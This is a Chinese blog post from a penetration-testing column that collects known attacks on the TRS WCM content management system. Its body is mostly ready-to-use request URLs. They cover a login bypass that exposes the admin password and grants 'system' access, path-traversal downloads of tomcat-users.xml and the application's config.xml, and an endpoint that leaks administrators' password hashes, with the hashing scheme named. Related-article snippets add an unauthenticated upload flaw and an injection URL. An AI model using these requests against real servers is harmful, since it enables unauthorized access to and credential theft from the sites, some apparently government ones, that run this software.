TRS的WCM历史漏洞

最新推荐文章于 2023-12-26 09:17:59 发布
最新推荐文章于 2023-12-26 09:17:59 发布
阅读量5.4k 收藏 4
点赞数
分类专栏: web渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42140534/article/details/107692415
版权

一、绕过密码登录

1访问网站的登录页

看到TRS WCM知道为北京拓尔思开发的一个平台,这个平台是存在相关漏洞的
在这里插入图片描述

2 在网址后面添加查看管理员密码的链接

wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin

在这里插入图片描述

3在地址栏中输入xxx:8080/wcm/app/login.jsp回车即可成功登录,且账号为system

在这里插入图片描述

二、任意文件下载漏洞

漏洞1:

漏洞存在于wcm/app/sysrem/read_image.jsp?Filename=…/…/tomcat/conf/tomcat-users.xml
此漏洞需要在登录后才能进行验证
在这里插入图片描述

漏洞2

http://xx.xx.xx.xx:8080/wcm/file/read_file.jsp?FileName=U020120628383491551127/…/…/…/…/…/Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx
在这里插入图片描述

三、用户密码泄露

TRS WCM6.0以上版本某个功能页面调用service限制不严格,可以获取后台管理用户的用户名和密码序列
访问链接 http://xx.xx.xx.xx:8080/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers
加密方式是:常规32位的MD5取前15位
在这里插入图片描述

https://github.com/Pa55w0rd/pa55w0rd.github.io.old/blob/3f6ed5092d35bb5bc3884aa8fe9d6aab8d88cf03/_posts/2018-11-08-trs.md
流年、黄昏
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
TRS cms用户注册漏洞
2ed
06-25 3310
据了解TRS WCM涵盖网站建立、内容服务、内容传递等内容价值链的各个方面,将结构化和非结构化信息提供给所有用户。 既然在外网能访问TRS WCM,那就方便许多了,由于是第一次遇到此系统,所以去wooyun上搜了一下相关漏洞利用方式,发现其实wooyun上公布的对这个系统的漏洞利用方式还是很多的,都是些高危漏洞,其中有三个高危漏洞可以很好的利用一下,TRS WCM多为gov站点使用,不过这里遇到了...
TRS内容管理平台用户注册逻辑漏洞
ytfhjhv的博客
11-16 1212
TRS内容管理平台用户注册逻辑漏洞
TRS WCM内容协作平台
07-08
TRS 内容协作平台处于TRS 内容管理基础架构的核心,秉承TRS内容管理CIO标准路线,集协作性、行业性和开放性于一体,是媒体整合、共享和利用数字内容资产,改善组织运行效率,提高核心竞争力的理想选择,可以帮助媒体快速地构建媒体网站、媒体内外信息门户、媒体办公协作平台、媒体的内容采编发平台等,实现全方位的内容管理。
TRSWCM7.0eee
08-28
TRSWCM7.0性能
TRS CMS(拓尔思CMS) 漏洞集合
热门推荐
收集盒 Book box
08-09 1万+
TRS(拓尔思)WCM 文件上传漏洞 影响版本: WCM5.2 WCM6.1 漏洞描述: TRSWCM是拓尔思系列产品的重要组成部分,服务于信息资源的发布。 Lee在对WCM6.1(STD1091SP2)进行风险评估的时候发现,file_upload.html未做访问限制,攻击者可以匿名访问上传页面进行文件上传操作。 说明: file/file_upload.html info
TRS WCM 几处突破点
工作ing
12-09 5878
TRS WCM
TRSWCM7.0文档
11-13
拓尔思的文档 看项目用到的 TRSWCM7.0发布置标手册 TRSWCM7.0管理员手册 TRSWCM7.0数据字典 TRSWCM7.0用户安装手册 TRSWCM7.0用户手册等
Trs-was.rar_TRS WCM_huntbsy_trs_trs wcm
09-14
TRS WCM 内容协作平台(以下简称TRS WCM),这是TRS集自身内容管理先进理念和技术,汇聚最新内容管理应用实践经验,推出的一套完全基于Java和浏览器技术的网络内容管理软件,TRS WCM实现全浏览器界面的内容创建、编辑...
trs wcm使用手册
04-24
TRS WCM,全称为TRS Web Content Manager,是一款强大的企业级内容管理系统,用于高效地管理和发布组织内部或对外的网络内容。本使用手册包含了从安装、管理到实际操作的全面指导,旨在帮助用户深入理解和有效利用该...
TRSWCMV7.0数据字典
06-01
本手册介绍了该系统涉及到的关键表的 数据表设计的说明,包含表名、表字段设计等,便于使用者更深入的了解 TRS WCM 以及基于此系统 做数据的处理和开发。
TRSWCM 后台 上传 图片 工具
09-07
可以从TRSWCM的后台直接上传图片,不用手动复制到服务器中,可以自动触发站点分发。
TRS WCM 5.2白皮书
03-04
TRS WCM 内容协作平台 5.2是TRS推出的一套完全基于Java和浏览器技术的网络内容管理软件,TRS WCM 5.2 实现全浏览器界面的内容创建、编辑和基于模板的内容发布,具备强大的站点管理功能,并提供企业级协作环境。TRS ...
TRS WCM SOAP接口说明
08-05
TRS WCM SOAP接口说明文档,用于外部程序批量采集入库。
CNVD-2020-27769 拓尔思TRSWAS5.0文件读取漏洞
最新发布
2301_81907423的博客
12-26 568
CNVD-2020-27769 拓尔思TRSWAS5.0
TRS WCM SQL injection
cnbird's blog
04-23 1700
来源http://www.wooyun.org/bugs/wooyun-2013-019753 首先是这个页面,好像是越权了 http://xxxx/portal/db/dbupdatelog_list.jsp 正常应该要登陆才能看吧? 直接注入 http://xx/portal/db/dbupdatelog_list.jsp?trandom=0.507869236874006&Page
异常SRVE0199E
weixin_30784945的博客
11-15 496
后台生成导出exe表格,在tomcat自己环境下完全没问题到websphere环境下保SRVE0199E产生这个问题是因为response.OutputStream已经打开再次打开就报这个异常,前台如果是window.location.href访问注意前次访问必须完毕否则报异常 转载于:https://www.cnblogs.com/zhanchaohan/p/9962345.html...
拓尔思TRSWAS5.0文件读取漏洞预警
weixin_46022050的博客
03-02 4306
拓尔思TRSWAS5.0文件读取漏洞预警 2018-12-13 10:48 一、漏洞描述: 拓尔思中文检索系统TRSWAS5.0web/tree接口treefile参数存在文件读取漏洞,可读取数据库配置文件、账户密码等信息,导致配置文件信息泄露威胁网站安全。 漏洞影响版本:TRSWAS 5.0 漏洞影响危害:中危 二、漏洞检测方式: 将***.com替换域名或对应IP直接访问可读取出配置文件信息。...
Fastjson远程命令执行漏洞总结
weixin_42345596的博客
08-05 3466
一.FastJson 简介 fastjson.jar包原始下载地址:https://github.com/alibaba/fastjson fastjson用于将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。fastjson.jar是阿里开发的一款专门用于Java开发的包,可以方便的实现json对象与JavaBean对象的转换,实现JavaBean对象与json字符串的转换,实现json对象与json字符串的转换。除了这个fastjson以外,还有Google开
java 解析trs文件
05-24
TRS文件是由TRS录音笔所录制的音频文件,不是文本文件,因此无法直接解析。如果您想要获取TRS文件中的文本内容,需要先将其转换为可读取的格式,例如MP3、WAV等音频格式,然后使用语音识别技术将音频转换为文本。以下是一些Java语音识别库供您参考: 1. CMU Sphinx:一个开源的Java语音识别库,可用于离线语音识别和实时语音识别。 2. Google Cloud Speech API:Google提供的云端语音识别API,可通过Java SDK进行调用。 3. Baidu Speech Recognition API:百度提供的语音识别API,可通过Java SDK进行调用。 4. Wit.ai:一个免费的自然语言处理平台,提供了语音识别功能,可通过Java SDK进行调用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值